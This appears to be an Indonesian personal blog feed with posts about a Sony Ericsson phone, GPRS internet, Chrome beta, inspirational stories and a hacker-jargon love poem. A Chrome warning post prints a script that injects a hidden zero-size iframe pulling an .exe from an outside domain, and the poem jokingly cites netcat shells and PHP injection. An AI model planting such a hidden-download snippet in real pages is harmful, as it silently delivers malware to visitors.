CHaT, eMaiL dan Berita di HP kamu

berhubung gw suka bepergian, dan Laptop gw jg dah rusak batrainya maka tercetuslah ide untuk membeli HP yg bisa GPRS dan JAVA dan juga MURAH.

dalam pikiran udah terbersit untuk beli HP Sony Ericsson kaya temen kampus gw (arif) eh delalah sama jg kayak chyank gw… Emak jodoh kali yee hehehehehe, dan dibelilah HP Sony Ericsson K310i seharga 700rb(baru), bekasnya paling cuma 400rb.. Aturan mau beli bekas tapi tanggung hehehe.

sony-ericsson-k310i-1

Baca lebih lanjut

Hati hati dengan Browser Baru dari Google “Chrome (BETA) “

Ada beberapa hole dan kelemahan dam hole yang ditemukan dalam browser terbaru versi beta milik google.

Berikut salah satu kelemahanya :

Chrome akan mengeksekusi secara otomatis file exe , terutama pada file yang disisipkan pada frame border.

Tips :

Berhati hatilah ketika menggunakan chrome, terutama saat membuka website website “terlarang” dan “bervirus’ !

Semoga google segera mengupdate kekeliruan yang lumayan ‘fatal’ ini.

<script>
document.write('<iframe src="http://www.domainnakal.com/virus.exe" frameborder="0" width="0" height="0">');
</script>

from http://www.seo-id.com/

jadi serem juga
maklum lah masih BETA
masih anak kecil lagi, yg baru bisa jalan.

Berinternet murah meriah dengan GPRS

By Aswin Sapta

Bahan-bahan yg diperlukan:
-HP GSM yg ada fasilitas gprs
-CD Driver dan kabel ke PC biasanya di bundel waktu beli hapenya
-Kartu perdana AXIS Baca lebih lanjut

Chrome : browser dari google

chrome-205_noshadow1chrome merupakan browser buatan google yang sangat ringan
memakan memory sangat kecil
dibandingkan dengan mozilla dan IE
chrome cukup baik walaupun masih BETA
semoga browser ini bisa lebih stabil dan lebih baik.

semoga browser ini memang browser paling ringan
soalnya gw udah cape dengan Mozilla yg makan memory cukup tinggi apalagi jika membuka beberapa tab.
pada IE7 jika buka web kadang seakan seperti nge hang.

setelah mencoba chrome dan membuak beberapa tab
resource memory yg digunakan cukup rendah masih sekitar 37-43MB
jika menggunakan mozilla bisa mencapai 120MB
IE entahlah udah jarang dipake

yah mari kita doakan semoga chrome diterima disisiNYA. Nah lo….
maksud gw semoga chrome bisa menjadi browser yg lebih ringan
dan semoga FF bisa mengikutinya….
nulis blog ini pake FF dan udah terasa lemoth setelah buka 6Tab

Bahan renungan

Ada seorang gadis buta yang membenci dirinya sendiri karena kebutaannya itu. Tidak hanya terhadap dirinya sendiri, tetapi dia juga membenci semua orang kecuali kekasihnya.
Kekasihn
ya selalu ada disampingnya untuk menemani dan menghiburnya. Dia berkata akan menikahi kekasihnya hanya jika dia bisa melihat dunia.
Suatu hari, ada seseorang yang mendonorkan sepasang mata kepadanya sehingga dia bisa melihat semua hal, termasuk kekasihnya.

Kekasihnya bertanya,
“Sekarang kamu bisa melihat dunia, Apakah kamu mau menikah denganku?”

Gadis itu terguncang saat melihat bahwa kekasihnya ternyata buta. Dia menolak untuk menikah dengannya. Kekasihnya pergi dengan air mata mengalir, dan kemudian menulis sepucuk surat singkat kepada gadis itu,

“Sayangku, tolong jaga baik-baik mata saya.”

Kisah di atas memperlihatkan bagaimana pikiran manusia berubah saat status dalam hidupnya berubah. Hanya sedikit orang yang ingat bagaimana keadaan hidup sebelumnya dan lebih sedikit lagi yang ingat terhadap siapa harus berterima kasih karena telah menyertai dan menopang bahkan di saat yang paling menyakitkan.

Hidup adalah anugerah

Hari ini sebelum engkau berpikir untuk mengucapkan kata-kata kasar
Ingatlah akan seseorang yang tidak bisa berbicara
Sebelum engkau mengeluh mengenai cita rasa makananmu
Ingatlah akan seseorang yang tidak punya apapun untuk dimakan
Sebelum engkau mengeluh tentang pasangan mu
Ingatlah akan seseorang yang menangis kepada Tuhan meminta pasangan hidup

Hari ini sebelum engkau mengeluh tentang hidupmu
Ingatlah akan seseorang yang begitu cepat mati

Sebelum engkau mengeluh tentang anak-anakmu
Ingatlah akan seseorang yang begitu mengaharapkan kehadiran seorang anak, tetapi tidak mendapatnya

Sebelum engkau bertengkar karena rumahmu yang kotor, dan tidak ada yang membersihkan atau menyapu lantai
Ingatlah akan gelandangan yang tinggal di jalanan

Sebelum merengek karena harus menyetir terlalu jauh
Ingatlah akan orang yang harus berjalan kaki untuk menempuh jarak yang sama

Dan ketika engkau lelah dan mengeluh tentang pekerjaanmu
Ingatlah akan para penganguran, orang cacat dan mereka yang menginginkan pekerjaanmu

Sebelum engkau menuding atau menyalahkan orang lain
Ingatlah bahwa tidak ada seorang pun yang tidak berdosa dan kita harus menghadap pengadilan Tuhan

Dan ketika beban hidup tampaknya akan menjatuhkanmu

Pasanglah senyuman di wajahmu dan berterima kasihlah pada Tuhan karena engkau masih hidup dan ada di dunia ini

didapat dr blog ndjamaliq

ViRuS CiNTa

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka, sehingga tidak ada keraguan saat aku c:\ nc -l -o -v -e ke hatimu, tapi aku hanya berani ping di belakang anonymous proxy…Inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati, whatever!

Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pakai PHP injection. Terus aku ls -la; find / -perm 777 -type d, sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku? Apa aku harus pasang backdoor “Remote Connect-Back Shell” jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch and pacth terus, aku akan jaga service-mu jangan sampai crash dan aku akan menjadi firewallmu. Aku akan pasang portsentry, dan mensetting error page-mu ” The page cannot be found Coz Has Been Owned by Someone, get out!” Aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system, jangan ada kata: “You don’t have permission to access it” untuk aku, kalau ga mau di ping flood . Atau Dos attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system…? Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan system-ku! Suatu saat nanti aku akan datang dan mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan. ga ada antivirus yang dapat menangkalnya selain …
KAMU!

Puisi pagi hari…

wahai matahari pagi
terangilah aku dengan cahayamu
aku yang terjerumus
ke dalam gelapnya cinta
yang membuatku sulit untuk melangkah

wahai matahari pagi
sinarilah aku
sebagaimana engkau menyinari dunia
bebaskan aku dari kehampaan hati ini
jauhkanlah aku dari cinta yang menggelapkan hati
dan membutakan mataku ini

wahai matahari pagi
kirimkanlah bidadari yang dapat menyinari
dan menentramkan hatiku yang gelisah ini

wahai matahari pagi
janganlah engkau meninggalkanku dalam kehampaan….
Malang, di pagi hari yg membosankan